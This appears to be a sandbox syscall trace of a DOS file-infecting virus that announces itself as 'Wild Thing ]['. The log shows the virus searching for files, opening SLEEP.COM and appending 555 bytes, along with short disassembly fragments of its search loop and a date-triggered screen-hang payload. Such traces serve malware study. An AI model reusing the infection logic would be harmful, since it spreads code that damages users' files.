2018-12-25T12:44:51.902183938Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.903519577Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.91198405Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.92286955Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.926298027Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.933380902Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.944510452Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.955224197Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.956937024Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.96147108Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.963082646Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.971457866Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.982987284Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.986752689Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:51.991536386Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:51.993852223Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:51.994924006Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:54.148958071Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:54.152120485Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:54.154666558Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:54.157937889Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:54.171399026Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:54.173204686Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:54.176118151Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:54.195357713Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:54.196805836Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:54.201501435Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:54.205979565Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:54.208817568Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:54.211197502Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:54.215921066Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:54.220058152Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:54.225702343Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:54.237862024Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:54.239908968Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:54.242583258Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:54.268039461Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:54.272563128Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:54.273891602Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:54.275582502Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:54.278045578Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.279378267Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.280704837Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:54.289630741Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:54.291444908Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:54.293142717Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.294965973Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.296503908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.297896932Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.299885028Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.301270925Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.302970677Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.305170055Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.306700393Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.308174975Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.313985922Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.315457521Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.316937262Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.318848357Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.320305544Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.32162571Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.323569189Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.325770061Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.327897033Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.338442545Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.341212739Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.343319482Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.345651848Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.347699824Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.34968603Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.35205053Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.353624604Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.355278397Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.360414644Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.362399561Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:54.368854143Z 62 PC: 8f90e | Close file
2018-12-25T12:44:54.371730576Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:54.373685591Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:54.375917497Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:54.382058798Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:54.383583008Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:54.388625033Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:54.391188315Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:54.39255516Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:54.394354246Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:54.396631673Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:54.398145499Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:54.399997471Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:54.403459003Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:54.405512054Z 73 PC: 8efea | Release memory
2018-12-25T12:44:54.407521877Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:54.410145845Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:54.412018573Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:54.41349534Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:54.415292416Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:54.426534018Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:54.433135524Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:54.435749897Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:54.437913897Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:54.462263807Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:54.464281382Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:54.466027256Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:54.468684305Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:54.470708077Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:54.472150336Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:54.473781865Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:54.476469989Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:54.47767065Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:54.480347507Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:54.486838871Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:54.493435265Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:54.49727561Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:54.499167542Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:54.500853651Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:54.501978545Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:54.505002247Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:54.506295595Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:54.508078523Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.510867766Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.511971409Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:54.513331356Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:54.515131934Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:54.522582151Z 62 PC: 131ba | Close file
2018-12-25T12:44:54.524584413Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:54.526160828Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:54.52752773Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:54.532508846Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:54.534824819Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:54.536775401Z 73 PC: 119df | Release memory
2018-12-25T12:44:54.538662704Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:54.541876272Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:51.41362779Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:51.415468728Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:51.417608022Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:51.420287702Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:51.423376414Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:51.42928047Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:51.440241202Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:51.446929076Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:51.462518034Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:51.469003798Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:51.470708368Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:51.477365545Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:51.478969965Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:51.482003485Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.484652503Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:51.493511767Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:51.4949992Z 62 PC: 12f2e | Close file
2018-12-25T12:44:51.504762851Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:51.514417509Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.51689754Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.523456178Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.532747631Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.539030107Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.541276695Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.547309193Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.548521798Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.551967144Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.553551823Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.561443785Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.563743986Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.571322081Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.580773118Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.584626918Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.590117734Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.599508107Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.608131967Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.609712702Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.623252763Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.625591271Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.628222558Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.62981315Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.638151662Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.63958413Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.648049307Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.658961268Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.662343211Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.668015848Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.6776315Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.687874656Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.68909152Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.695911817Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.698508837Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.701517573Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.703915108Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.712435766Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.714200858Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.722529477Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.733900475Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.736816469Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.742288869Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.752777079Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.759315205Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.760622043Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.768359541Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.76965269Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.77266072Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.775016195Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.784004462Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.785406756Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.793511715Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.803170057Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.805633324Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.812051575Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.821843309Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.828612063Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.830371768Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.836773664Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.838083403Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.841115663Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.842741028Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.851666014Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.854019678Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.861681483Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.871405691Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.874437785Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.879889619Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.889114527Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.900759584Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.902095646Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.908217958Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.90969232Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.912707596Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.914924771Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.922599488Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.924857434Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.932182646Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.94181637Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.94535469Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.951052081Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.960561682Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.972403264Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.973749897Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.980160044Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.982224874Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.989385165Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.998867215Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.001499594Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.006015343Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.007928202Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:52.009909903Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:54.147523337Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:54.149122755Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:54.151933725Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:54.154620084Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:54.164950403Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:54.166947902Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:54.168528076Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:54.182643275Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:54.184931225Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:54.189579602Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:54.192904321Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:54.196722877Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:54.198923157Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:54.202266291Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:54.20620213Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:54.211967464Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:54.221883328Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:54.22328476Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:54.226086372Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:54.246783486Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:54.250810349Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:54.252964575Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:54.254170029Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:54.25533688Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.257751153Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.259145799Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:54.26680745Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:54.269328653Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:54.271106651Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.272606868Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.274803644Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.276618023Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.278917586Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.282945488Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.284748528Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.286459277Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.289624386Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.291683179Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.293404855Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.295741788Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.297687387Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.299392412Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.302144168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.304118653Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.305752826Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.307552698Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.309621225Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.311260507Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.312870708Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.316561926Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.318437873Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.32028592Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.323294624Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.325147336Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.326987347Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.340366892Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.342049666Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:54.343841055Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:54.349922868Z 62 PC: 8f90e | Close file
2018-12-25T12:44:54.352001449Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:54.353895163Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:54.35676089Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:54.361958795Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:54.368621231Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:54.377712029Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:54.379405593Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:54.380812526Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:54.383504487Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:54.384971499Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:54.386225499Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:54.388722515Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:54.390712913Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:54.392312544Z 73 PC: 8efea | Release memory
2018-12-25T12:44:54.394391596Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:54.396521567Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:54.398373559Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:54.40064093Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:54.401874004Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:54.412088925Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:54.418864917Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:54.420316764Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:54.42210885Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:54.443244321Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:54.444696542Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:54.446420094Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:54.44969653Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:54.451369749Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:54.453643315Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:54.456589037Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:54.468195415Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:54.470100745Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:54.474169487Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:54.47987836Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:54.485845345Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:54.491004484Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:54.49286007Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:54.494287868Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:54.49642293Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:54.499099388Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:54.500189007Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
